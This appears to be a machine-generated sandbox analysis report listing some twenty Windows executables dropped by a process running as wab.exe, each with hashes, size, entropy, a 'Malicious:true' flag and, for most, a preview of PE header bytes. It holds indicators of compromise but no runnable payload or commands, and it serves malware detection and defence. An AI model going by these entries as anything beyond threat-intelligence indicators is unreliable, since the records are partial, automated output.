                                                                              SSDEEP:6144:cwACThwS0vn9IdRsLGEJTdPA6lDfZNAGVx:cwACThwSSn2dRANtlF3j
                                                                              MD5:3B0A8B5E4045F2972D8139D1EB68FF5D
                                                                              SHA1:91653217660FF749728075DFCDD7DD3935D6DD07
                                                                              SHA-256:795757B494CE9CF653E25E61512370283B0DCE892F0FA4AD641CE5353BB2E9D7
                                                                              SHA-512:EBA564D4D158CD2FDBA10A915D2837958EAD114E0A71F31AECDE8BC54A1EBAFE305279A90429D98A7BB6214623D667C704A31B2E788EE974EADB02E0FDB9CEE4
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):225704
                                                                              Entropy (8bit):5.993164766056159
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkRLqB8edYkIrv6TXRw9xwqazULDjkAJZo0RAjUIqXfkRC:mjilq8OPwRzso6AQ5yC
                                                                              MD5:978D692068FFF1979AA85A22C7774B82
                                                                              SHA1:3356A00B00B04A3DEB7DB995C45990D0C2C99947
                                                                              SHA-256:0402398E41C93D6925AD34ED076C935E32A0D3437F04621A40A1B36AD83E9855
                                                                              SHA-512:8410502EB44D2FC186609AC25F29796475F0FCA44688D3266C95FC09FCB350A9ACF7B247797FD9CE71EE4A5D8CCC6F0F32DCFFDA2D5FC5626C7D4C3B6539FD28
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):84928
                                                                              Entropy (8bit):5.709408438671853
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoY67wZClMML07MiapFmPRHyzMwzobtM+zf:/rkN67wZClMMQ7MiawHyzMwsL
                                                                              MD5:322701BC6FF92F3789B1C9105C11F393
                                                                              SHA1:16B5BE10FE983EA904C06891581F127C03915C41
                                                                              SHA-256:6097218FB5318A7671C154F5D06BCB888296D7BD5E301F6DC3D73363CBEF9713
                                                                              SHA-512:6549D7DECCDE4489BC04508E562372B94F834EEAEFBAFCF8FB65B600FDF13338AFAA47F9412DC886E38B7E782DBF464AFE37847C4CBB75C3D88759F17AD08208
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):83816
                                                                              Entropy (8bit):5.759188593692372
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoP0s7wZClMML072apFmPcnGzLHyxz5pOEtmwxz5E:/rkat7wZClMMQ72ahnGzextQyxtE
                                                                              MD5:9D3499779ECEF0A457BB315144B20EFC
                                                                              SHA1:F144F384645733E14C1D1923241135D6CD9DA04B
                                                                              SHA-256:A2A2F6C89369BB6F130D363510E05964829C18F9B928D7836628051C06233675
                                                                              SHA-512:FEB9CB23D90149AD2CC9EB037B5B9DD810070863EBB3D5787B6BA84C6F98ED496C19201EFCBC0C4A23F835497A4A789E0824FDEA1840D728D334CF240EF38D15
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):233832
                                                                              Entropy (8bit):6.144128303355593
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkGW32GhNvMQ/58sl2U2Gszlz4SNBZCgMWku:g2GhN0lsdspzPgg1
                                                                              MD5:D932FC7F938D7FAA076BDF0F32C1C14C
                                                                              SHA1:289A2046B00A40433ED38C2E87BDB29EBF58D63E
                                                                              SHA-256:FCC50AE05512C451B0F9C0C89582C0F8411C1A52A99F1C51AD39902478BE59E4
                                                                              SHA-512:DF559DBD4E0918B205C94F2BE0361C7FD50BC9431AF41A90EAB35743B288EA208F658799E0CA96D29892D6A89A9F5A37DE6DB5684B898526F39B0AE46A8F9C4A
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):502632
                                                                              Entropy (8bit):6.587262136505295
                                                                              Encrypted:false
                                                                              SSDEEP:6144:RWDxGH79J2VX5gEpvm7JA8I6BHAlSpFG/+Ls3ze30xB7zq2zs:2MxCvm7JK6JAB/6N30xpI
                                                                              MD5:097728BC9E3AD3C6955B58A1CCB73D23
                                                                              SHA1:832DDD4349D69A41DC22131C341094A55742EE68
                                                                              SHA-256:1D19D526CB1E90C4C0553E74ED0DD07996AA9379764D76FAFFA2C8394A8BF81D
                                                                              SHA-512:DAE8E3CC44495E9A3FD45AA4DA02123DEE714AF06E88DAEAA8FC4F03CAD53B07CF3DB47F90C95E01CF65F2B045F9BE6F8CEF15908224226EE7C54E902519C77A
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):352704
                                                                              Entropy (8bit):6.234328618673098
                                                                              Encrypted:false
                                                                              SSDEEP:6144:TEshacHeGXduZtZ9zHVcI3uv7FgR3FTzWQ/ZZyp1:IsHHrtuZtPvh3FuQ/jyp1
                                                                              MD5:23DBC58CDF96B3DC8D931BCBCD1F0259
                                                                              SHA1:C771539F3FA9F1AF9A9E9D6F257A9A3C5317772E
                                                                              SHA-256:63DB8B997CB7CDCAC4360929C5998A232B9A429DDD74A88EEAEB8AAA29D24474
                                                                              SHA-512:CDD9152B00EA205E0238FD7997FD96B2CF0718E7290630718B1128998F80E9F0E3C347DE1C476AAB67DC7E09BC8CA816CA39D321D85BB03DACF06269C9F5F169
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4395184
                                                                              Entropy (8bit):5.9241413364591375
                                                                              Encrypted:false
                                                                              SSDEEP:98304:cXuo5RMru45b5dZlAj0sqW7YDKMzVwgBWMTwLe7G:OR345NRAgsr7QH6h93
                                                                              MD5:6B5846BC42DB676458124E9B64BEF429
                                                                              SHA1:764B0FC6F01544F8E39BBEE16E55B5A1ADFDB014
                                                                              SHA-256:CEE14668777B06EAB589D4D29A9510B89A0A0D62DACFD2FED1CEC7ACFD66960E
                                                                              SHA-512:34257DCA4FFE6CE8C402F9E065DF582B4E221E14D3AFE622909B0AE48C80CCB212378B7437B5FF78E013B995F712B0BE79902500343CFE46D7F6127AA584090F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):603928
                                                                              Entropy (8bit):6.447229278008163
                                                                              Encrypted:false
                                                                              SSDEEP:12288:hzKRgqBDxoiPCLXHLuk/Wg4Reh2mbeF+IGboJdx:hKgMxoiPoXruPi/++IvJdx
                                                                              MD5:8EF30B3A7AEB63420B6DD95D081D9046
                                                                              SHA1:871F1B5483B0487627DEADBC7316C8B9440042E8
                                                                              SHA-256:B1C572271C709039685AE45086A1D3B57EE8F31D6A9030C6F47DAAF2551A6449
                                                                              SHA-512:B5A9A27D83F5D4F5169DAA58D348C855ACDD37C8D05436F1B63725517E8C0ABB637181CC569DDDBF8EF1603F5143EF844577E1DC664405033F20E2156445E984
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):507024
                                                                              Entropy (8bit):6.027052491483809
                                                                              Encrypted:false
                                                                              SSDEEP:6144:GyrmBq0RYSv3A5DhW15yChMFt2XTNJWLgCWzzYhPRt+:nrmBjYuALWJMn2XTmL7hPH+
                                                                              MD5:6C2D19BFA4446F763A05A97156FBF558
                                                                              SHA1:F08182FA8F68EACB2E906C7627811D490CBD7D14
                                                                              SHA-256:5234568C60B2F49995703548666C8A2DCD7745019122D29DAC1020EA19CE161C
                                                                              SHA-512:57AF1362D3422B04AF1CF245A4FD2A1089D024FC679659FBA5F892E1CDCF984F8E6F8652690FA5A9A799DA2B722474B61AE6C32C7CD7A330173EB6D3AD032675
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):251560
                                                                              Entropy (8bit):6.413231422944333
                                                                              Encrypted:false
                                                                              SSDEEP:6144:momAAOwPcPIqk4Vsvt0uews+qZP9zOPBxGiryKI:msAETlVsKzZPixGBKI
                                                                              MD5:4D9D18E2B09F2435D61B77935C0A7664
                                                                              SHA1:3C0B98D91076BA322485390558E474CF933CD146
                                                                              SHA-256:8677F97FE78DD2916AB1DFDBCB98FB08652D80F81C4C8FF5EE1C3F8EF3F93051
                                                                              SHA-512:09393D9CF957E93D3D2B1D747C524C7208A7A404A17BA94B2E0B462632CE03CA2804770B2C670BACEA5C8CBF179CCDE11888670083B99964B4A998CB9B13250F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):751720
                                                                              Entropy (8bit):6.572900922542691
                                                                              Encrypted:false
                                                                              SSDEEP:12288:xdI8PdgELg6eaBlnjlZcTerWv+xdeFhvCs9TukINOW:xa8PWELTBlZ+erw+xdeFUsUkEh
                                                                              MD5:6900C008B34CBCC5A50AA56C83EEB3DD
                                                                              SHA1:9CD9B4CE42AAD96B998FAC22B0F125D70AD2E5FC
                                                                              SHA-256:21119A1B53F614118699759D944278DFFD5DE92D285B7250E05E5BB42C444D7C
                                                                              SHA-512:D41AAF60C3E1A7F7FF972457DF8C5031E7CF133B894AD467D100ED66D342CD893BBA87E9F0397E35F3A3D6690DF19E324B6B029DA20B13981D51485860CB6CDC
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):161968
                                                                              Entropy (8bit):6.179397526086976
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkbNDS5lS5jITI1FeBT77NDS5lS3j+Wzy6oUSA7hZ:QNDS5lSlFeBTfNDS5lS7zUrsZ
                                                                              MD5:2D46116FB35E1B827866BFD7581347AA
                                                                              SHA1:CB5966248987F82189124B1782F84068F75B9B15
                                                                              SHA-256:6406E08D3292F2A72548F766EC5ABEC2AD7DB3E4D8A42F7F33AC56ADFFA487C3
                                                                              SHA-512:A87CE9F9E76E98655EA7310466E314FAF5CC98E3AF8B46E2E2908294A3995027960D4BD42356FD2F7019B71055512937565A1DE375DEB4111D052B2F30C42641
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):159560
                                                                              Entropy (8bit):6.228746819324478
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk+klWPsom9TiWWWWWWWQM+FtWAzhIwaeENinkf8xw3xUFv2tGPrtPmF:Bb5zPaNQnBxw34Oita
                                                                              MD5:1E2398318A0110A81DAAECBE4A1020C2
                                                                              SHA1:DEB0A629A1BEFE2059CA8195A55BFB31EB18C557
                                                                              SHA-256:32F7146C09BF7270AE036DD8AEC6C398B9611D1D00CA131BE697BA65A1BD4A3F
                                                                              SHA-512:C9616CBE33AF9C57C5D918953592388376F7114DDF37F8C9AE4F834420F627CA4F1F89159DA02F5AF6D029CD60549490B99D45627A7F39E06CD250CA840F66EB
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2233240
                                                                              Entropy (8bit):6.273525911634119
                                                                              Encrypted:false
                                                                              SSDEEP:24576:FDZgOA74U4o//sbtwvZTqFDk9sg71SmY90gh/G7QJoma+9duNGeVG29H:FqHVhTr5UmY90sGE5dIDG29H
                                                                              MD5:1BCB6735406FB145CADA541083819C2B
                                                                              SHA1:3CFD31C066860F804E658DBB76CF6CE14D342A24
                                                                              SHA-256:4D7B34ED22D207B0BD737C7CAF2137DBC2F3C47BAE9E753DDD02EC5072FEC989
                                                                              SHA-512:3F533C971AB5824DD75FA8D035503BD12F30D5099C0AA6F8CEB08429EE91B703CCDDC4A2A3442B850C057945A176F1A2B4F6D20FF259A682D285822A12CFB5DD
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):214432
                                                                              Entropy (8bit):5.707538571611537
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkeVFptXofXXXXXXuh9gLzltw6Q1hqOJHrtTh:rtXofXXXXXXASLzb9uhqK
                                                                              MD5:9FA79F3FD29775D061E8E14C460E4C66
                                                                              SHA1:57859E5326791527692F5F825DC0ECD2670A1FBC
                                                                              SHA-256:F9FFA9E69AAA1A753087479D138A0FF14CF3C74F32FECD1659C29CCEF77F5ACB
                                                                              SHA-512:EBEEE5EC5199BB7F0B09D89D033C351797905C242CF9B73F26A69AFBD079D19B9EBA8AA6AE3319E3E0FC49FFBB8916D3D2EC3376A117A5E73F47EB27AF4D2744
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):620840
                                                                              Entropy (8bit):6.51363323895205
                                                                              Encrypted:false
                                                                              SSDEEP:12288:soBdI/BUQtsfBCegl2eccL1q/xRyye7BfcwqEhDe:soM/BB0Bml2m1q/xRPCcwFC
                                                                              MD5:ED4493E7B083EC9BE4A475763BFF5F33
                                                                              SHA1:47A57367C50E528213DA802D54C6C4C8B310C8DC
                                                                              SHA-256:13A1EAF65B046FEA9BC73895CC572D9DA0062DC55636931C5F9AC5379636A581
                                                                              SHA-512:95DFC4770836D252B0FE9637E1F320D62DAF1C0965795F13E93D8C75BF704D70C754A199E687BFF655AD4A1CD1F998CAF2B9F552E4280E090927B030FBF19A1B
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1568248
                                                                              Entropy (8bit):5.637684770188403
                                                                              Encrypted:false
                                                                              SSDEEP:12288:QwF+k53zCG2tIuQ6DtJQSZDhLOhkZzV5i9w/lmd+jrcUiACW:lFXG6uQ6D9L2uV50AlmsjYUiAB
                                                                              MD5:121C03BBA1251851A260DBF96511E94B
                                                                              SHA1:E11BABB614ED80A1C9CD053E2D25B6F7DF6E0B29
                                                                              SHA-256:8C448212DF185668CAF1A984DC7BD9BF6A98FC30EFC35C509B4B6204B1CFA544
                                                                              SHA-512:0BA4A192DC50C8CF02C1FE67448E907D5F0D68008F2471EEF4DA17D601C5799893E151AE2373594F25C891CCDA6EBD3B02313C5C3D7874D5EC6179FE64978FD0
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):634800
                                                                              Entropy (8bit):6.637580106141556
                                                                              Encrypted:false
                                                                              SSDEEP:12288:1f/4sOdw+RfEB6tuAlnWhGZco6ijmn5jFTSt7yCPUkazi7JThVoSZeR6aQTJ:h/4Vdw+Ra6V6g2kazidN6SoEVF
                                                                              MD5:D40F85B4848B912F785873A0F65929F8
                                                                              SHA1:6DBC6F68210F0614C88123391277797A44EED64A
                                                                              SHA-256:FA0CF60A3DE793BBFB2BF327A9CD8BF13D7B0A443EE063B160DAAEA98129C678
                                                                              SHA-512:78D0223530930F5891AE52E7F752B0637B449EEFC0FADF9E3E27B9EABAF49834EFA805A897C512A7D8C09F466DA98A402D09C1F02C6827843E6AF961C60702E6
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):748192
                                                                              Entropy (8bit):6.652535866207215
                                                                              Encrypted:false
                                                                              SSDEEP:12288:sKxLM1deLycUTc1kZi7zb1QRHhhj7WGvF5PYcdTFtZ3G97aSDGGHrbTwqFwydBf6:syY14evTc1kZi7zb1KHL8vbTlwOBC
                                                                              MD5:6BA8B9E3FE4CDE976E7480E68BC2D0DF
                                                                              SHA1:88A1B0CCECBB9F1D10303D6E727C7C8CAD46B157
                                                                              SHA-256:B5D160CF12ECEDC0FADAB400C24A4B0096332CFD18ECACEE97A7D746EA36EA0F
                                                                              SHA-512:0B7157C1FDA4F97CF56A2562FDF678EB946AE9FF76A6102487F6A32B146684A5E12D532802185AEEEC6AF99AFB026E6C7A71AB4BC3D85891923EAB91B246F915
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1917048
                                                                              Entropy (8bit):3.7936073169931026
                                                                              Encrypted:false
                                                                              SSDEEP:6144:PBeXsm81c57ZXFzY5Ucyw4TapP25xxlq4cUcMeTOMzwMwZ:ZKs78A5UcyOPexxPcUcMeyvZ
                                                                              MD5:1C15447004EDADF6833C19CB490ECE02
                                                                              SHA1:EC2BDA5403AE8E0D06EA17CB56B70A6129E95FD5
                                                                              SHA-256:29A87A9191EC08DDAAA96ADCAE7B131997BD487BECCF9182CB1CA517B8B9A1C6
                                                                              SHA-512:2420427BA2F4FB7CC886AC96A38BA7909FD5403244EA9F0927A9CF83C22C2C46BEE2565ED8C9F5637D533A88916587D0B2677F4AB13B13A78526C6D26531D696
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4099520
                                                                              Entropy (8bit):3.697376679380454
                                                                              Encrypted:false
                                                                              SSDEEP:12288:hyKs7cvZIFpCYVIUN2mGsb8HtkLaHLH04cLbUBRjLmP29DyZbT9oc/m06aCzE6hE:hyKsY+dy0ZScIBqBT11S0
                                                                              MD5:89B7FD5BD551EB1C9F7347C6FB777C6F
                                                                              SHA1:994B8F597860E88D2A0F56D2F4A1D46756F47307
                                                                              SHA-256:267D501C9F2904DE5E11EB3D6D33AD081356D97F84388528E3B517691C1283A8
                                                                              SHA-512:011AF68C1390FC0B4FC853FF96310ADF8936136C21D5E8909BF16A7E7FAF1CA324047CA03EACB16E6071A8AD9FA0943EC4937C51F895A3B6B162FAF7AE6C3D4F
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):452120
                                                                              Entropy (8bit):5.929411837073156
                                                                              Encrypted:false
                                                                              SSDEEP:6144:EvhCpFviM0OKAOVf3m+2fCz29fx8/eAeTu:EEpFVKj3mFn9q
                                                                              MD5:8895327CB903B0DC08F23035A992E2B2
                                                                              SHA1:C03E385FB58E49047E5E8A338265793EC94731EC
                                                                              SHA-256:F9D3CDD157B30B4A98770225BFCCDDA2E71511B3A90339BFD2C8EBE11F05E3CF
                                                                              SHA-512:B8D4557F3B8B67D7F569953FDB2A36F2F396B516F40751F6E6B2C905F614F552A163028772514B93C39B0724AB7B734E4BBECF361EDA2FA6BF8DF62740A51CA2
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):116664
                                                                              Entropy (8bit):6.10338252591718
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VoSpuG+Ogz7jzJQHt9+zwIws8p95Zs0v+ISDr34+3RnQymkst:/rk5uGaz7jFQ68ICP5q0WISDr34W+wst
                                                                              MD5:6A915BA50F7E345F1062F27B1CA597F8
                                                                              SHA1:EA91C6AE9800EA18BB949492D41CD42769CD6D7A
                                                                              SHA-256:C3075BEF0B2FACF27E33C4CDF19DD11BC1C5DC93CDCC710B3C6B6C3AD7FB42A8
                                                                              SHA-512:7AD107B4FDC3776269717D28A789BD8D2ADA898DF1FE34DDC3B93FFDFA9CCC6E01F017914F2D3FCECB23789147C43FB420AD099E0D2FEDDE106F18333CDA1112
                                                                              Malicious:true
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):167392
                                                                              Entropy (8bit):6.22614950708567
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkgWKZbTKeR3Tzp+8IxR8jYYrjHaVLIPSL1CgNX:fWK11Rp+8II5SLUgp
                                                                              MD5:4B763805BE542D63E26C934813DD48E1
                                                                              SHA1:FE1C7ACF48DC8EB78744DDC16CFA04A232A8D8E9
                                                                              SHA-256:500DBAA3FBAF86BE75A82B70BEA0C6550112B14C93FE4F87EBA018D787780D49
                                                                              SHA-512:FFB9A1D674800302C4B7156DE4C49FF2421774061FFBCBE2E058BD119EE310DCF65CA2B123133FE05C2430613463DED3DA76AC1DD91EA0E18CC28AC036703EA2
                                                                              Malicious:true
